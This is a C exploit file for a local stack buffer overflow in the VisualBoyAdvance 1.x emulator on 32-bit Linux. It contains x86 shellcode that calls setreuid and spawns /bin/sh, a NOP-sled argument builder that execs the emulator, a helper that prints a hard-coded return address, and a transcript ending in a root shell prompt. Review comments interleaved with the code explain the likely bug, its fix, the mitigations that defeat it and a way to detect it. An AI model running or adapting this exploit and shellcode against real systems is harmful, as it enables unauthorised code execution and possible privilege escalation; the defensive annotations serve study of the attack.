/*
 * VisualBoyAdvance 1.x.x local Shell Exploit
 * by Qnix (q-nix[at]hotmail.com)
 *
 * Example :
 *
 *   [root@Qnix exp]# ls V* exp*c ret*c ret exp
 *   exp ret.c VisualBoyAdvance.cfg
 *   exp.c VisualBoyAdvance
 *   ret VisualBoyAdvance-1.7.1-SDL-linux-glibc22.tar.gz
 *   [root@Qnix exp]# ./exp
 *   Segmentation fault
 *   [root@Qnix exp]# ./ret
 *   -1073745328
 *   [root@Qnix exp]# ./exp -1073745328
 *   VisualBoyAdvance-SDL version 1.7.1
 *   Linux version
 *   Seaching for file VisualBoyAdvance.cfg
 *   Searching current dir: /root/tools/exp
 *   Reading configuration file.
 *   sh-3.00#
 *
 * :)
 *
 * Review notes (defensive reading of this proof of concept):
 *
 *  - Every command in the transcript is run as root, so it shows code
 *    execution inside the emulator process, not a privilege gain. Whether a
 *    privilege boundary is crossed depends on how VisualBoyAdvance is
 *    installed (setuid bit, privileged wrapper); the page does not say.
 *  - The vulnerable code is not shown here. The program below passes about
 *    2.3 KB as the first command-line argument and the shell appears after
 *    "Reading configuration file.", so presumably that argument is copied
 *    into a fixed-size stack buffer without a length check -- confirm
 *    against the 1.7.1 source. The fix on the emulator side is a bounded
 *    copy (snprintf with sizeof the destination) that rejects over-long
 *    paths.
 *  - The technique assumes a fixed stack address (the constant printed by
 *    ret.c) and an executable stack. Address-space layout randomisation, a
 *    non-executable stack and a compiler stack protector each break one of
 *    those assumptions.
 *  - Detection: an exec of the emulator whose argv[1] is several kilobytes
 *    long and holds a long run of 0x90 bytes stands out in process-exec
 *    audit logs.
 *
 * exp.c
 */

/*
 * 46-byte payload for 32-bit x86 Linux: the bytes cd 80 are "int 0x80"
 * system calls. The values loaded into al are 0x46 and 0x0b (setreuid and
 * execve in the i386 system-call table) and the trailing bytes
 * 2f 62 69 6e 2f 73 68 spell "/bin/sh". The array contains no zero byte
 * before its terminator, which the strlen()-based copy in main() relies on.
 */
char shellcode[] =
    "\x31\xc0\xb0\x46\x31\xdb\x31\xc9\xcd\x80\xeb\x16\x5b\x31\xc0"
    "\x88\x43\x07\x89\x5b\x08\x89\x43\x0c\xb0\x0b\x8d\x4b\x08\x8d"
    "\x53\x0c\xcd\x80\xe8\xe5\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73"
    "\x68";

/*
 * Builds one long argument and executes ./VisualBoyAdvance with it.
 *
 * argv[1] is the decimal value written repeatedly into the buffer; the
 * transcript above passes the number printed by ret.c.
 *
 * Buffer layout after the three loops, for a 4-byte long:
 *   [0, 1900)     0x90 filler bytes
 *   [1900, 1946)  the shellcode array (strlen(shellcode) == 46)
 *   [1946, 2280)  the repeated argv[1] value left over from the first loop
 *   [2280, 2300)  never written, so the argument has no explicit terminator
 *
 * No #include lines survive on this page, so atoi, strlen and execl are
 * used without declarations.
 */
int main(int argc,char *argv[])
{
    char buffer[2300];
    int i,x;
    long *ptr = (long *) buffer;

    /*
     * argc is never checked: with no argument argv[1] is NULL and atoi()
     * dereferences it, which matches the "Segmentation fault" in the
     * transcript. 570 longs are 2280 bytes only where long is 4 bytes; with
     * an 8-byte long this loop writes 4560 bytes and overruns buffer itself.
     */
    for(i=0 ; i < 570 ; i++)
        *(ptr + i) = atoi(argv[1]);

    /* Overwrite the first 1900 bytes with 0x90 filler. */
    for(i=0 ; i < 1900 ; i++)
        buffer[i] = '\x90';

    /* i is still 1900 here, so the payload is placed right after the filler. */
    for(x=0 ; x < strlen(shellcode) ; x++ )
        buffer[i++] = shellcode[x];

    /*
     * The buffer becomes argv[1] of the emulator. The list is ended with a
     * plain int 0 rather than (char *)NULL, which is only equivalent where
     * int and pointers have the same size. The return value of execl() is
     * not checked.
     */
    execl("./VisualBoyAdvance","VisualBoyAdvance",buffer,0);
    return 0;
}

/*
 * ret.c
 *
 * Prints the constant 0xbffff250 with %d; as a signed 32-bit value that is
 * the -1073745328 seen in the transcript. The address is hard-coded, so it
 * is only meaningful on a system whose stack is not randomised. The header
 * name after #include is missing on the page; <stdio.h> is what printf
 * needs. The local i is unused.
 *
 * #include <stdio.h>
 * int main(void) { int i; printf("%d\n",0xbffff250); return 0; }
 */